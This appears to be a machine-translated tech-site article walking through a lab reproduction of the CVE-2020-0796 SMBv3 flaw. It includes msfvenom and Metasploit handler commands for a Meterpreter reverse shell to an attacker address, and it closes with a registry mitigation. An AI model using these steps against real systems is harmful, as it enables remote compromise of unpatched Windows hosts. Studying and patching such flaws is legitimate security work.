Shulou(Shulou.com)05/31 Report--

This article shows you what the CVE-2020-0796 SMBv3 vulnerability recurrence process is like, the content is concise and easy to understand, it will definitely brighten your eyes. I hope you can get something through the detailed introduction of this article.

1. Scan the host for leaks

Scan py file links

two。 Download available POC

Poc address

3. Using msfvenom to generate shell,lhost in kali is an attack machine ipmsfvenom-p windows/x64/meterpreter/reverse_tcp lhost=192.168.236.130 lport=4444-f py-o exp.py

4. Replace the generated shell with the USER_PAYLOAD of exploit.py in the poc folder, all of which are replaced

5. Enter msf to turn on listening use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lport 4444set lhost 192.168.236.130run6. Run exploit.py

7. Check to see if the monitor is received

If an error is reported, modify the parameters of exploit.py according to the error.

Repair recommendations:

Disable SMBv 3 compression, as follows

Set-ItemProperty-Path "HKLM:\ SYSTEM\ CurrentControlSet\ Services\ LanmanServer\ Parameters" DisableCompression-Type DWORD-Value 1-Force

The above is what the CVE-2020-0796 SMBv3 vulnerability recurrence process is like, have you learned the knowledge or skills? If you want to learn more skills or enrich your knowledge reserve, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.